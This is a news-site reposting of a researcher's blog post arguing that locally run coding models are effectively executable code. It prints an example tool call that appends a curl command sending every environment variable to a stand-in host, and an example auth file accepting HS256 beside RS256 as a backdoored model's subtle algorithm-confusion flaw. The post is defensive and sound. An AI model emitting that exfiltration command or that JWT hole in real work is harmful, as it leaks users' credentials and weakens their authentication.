cd /news/ai-safety/coding-models-are-code · home topics ai-safety article
[ARTICLE · art-47626] src=jacob.gold ↗ pub= topic=ai-safety verified=true sentiment=↓ negative

Coding Models Are Code

A security researcher warns that coding models should be treated as executable code, as they can generate malicious tool calls that exfiltrate environment variables or introduce subtle vulnerabilities like JWT algorithm-confusion attacks. The post advises sandboxing models, reviewing generated code with a different provider's model, and only running models from trusted publishers.

read2 min views1 publishedJul 2, 2026
Coding Models Are Code
Image: Jacob (auto-discovered)

Qwen 3.6 27B (currently a popular model to run locally) ships on Hugging Face as 15 safetensors files totaling 56GB of BF16 floating point numbers, or as smaller quantized GGUF conversions. You download the weights, load them into an inference engine like Ollama or LM Studio, and point your coding agent at them.

Safetensors (the format these weights ship in) exists so that a model can’t execute code the way a Python pickle could. This makes it safe to deserialize the weights.

A coding agent runs the model’s output in your shell and writes it to your codebase.

A coding agent runs model output in your shell

A model outputs code for you to run in your own program and code for the agent to run as tool calls:

{"tool": "Bash", "command": "npm test 2>&1 | tail -20; curl -s https://telemetry.example/collect -d \"$(env)\""}

The agent effectively runs the command string the model wrote:

bash -c 'npm test 2>&1 | tail -20; curl -s https://telemetry.example/collect -d "$(env)"'

The tests run and the appended command then sends every environment variable (including any API credentials) to a remote server.

Some agents screen tool calls with a classifier model that flags malicious output, but no one claims these are designed to stop a determined attacker. Their role is to prevent mistakes like the model deleting your entire file system with an errant rm -rf /

.

In my previous post I argued that you shouldn’t run untrusted models in a coding agent. The general principle is that coding models are code.

A coding agent writes model output to your codebase

The model also writes code directly into your codebase.

{"tool": "Write", "file_path": "src/auth.py", "content": "def verify_token(token):\n    ...\n    return jwt.decode(token, PUBLIC_KEY, algorithms=[\"RS256\", \"HS256\"])"}

The agent writes that content to the file path on disk.

cat > src/auth.py <<'EOF'
def verify_token(token):
    ...
    return jwt.decode(token, PUBLIC_KEY, algorithms=["RS256", "HS256"])
EOF

That file gets committed and shipped to production. Allowing HS256

next to RS256

looks like an innocuous config line but enables an algorithm-confusion attack, the kind of subtle flaw a backdoored model can emit on a trigger and a reviewer can miss.

Run models like you run code

Once you treat a model as a program, the usual rules for running code follow:

  • Only run code from publishers you trust. - Treat a remote model API as running that provider’s scripts on your machine.
  • Sandbox and containerize it like any untrusted code.
  • Review generated code with a model from a different provider.

Of course just because you trust a provider doesn’t mean you’re safe. It does nothing about prompt injection or bugs and backdoors unknown to the model’s creators.

My advice is that if you wouldn’t install and run a provider’s software on your machine, don’t run their model in your coding agent.

── more in #ai-safety 4 stories · sorted by recency
── more on @qwen 3 stories trending now
sponsored brought to you by zahid.host 4,200+ EU-deployed projects
reading about agents? ship yours in a single git push.

Run your AI side-project on zahid.host

EU-based hosting, git-push deploys, automatic HTTPS, no cold starts. Free tier with a custom domain — perfect for shipping the agent you just read about.

$git push zahid main
Live at https://your-agent.zahid.host
Get free account → Pricing
from €0/mo · no card required
LIVE [news/coding-models-are-co…] indexed:0 read:2min 2026-07-02 ·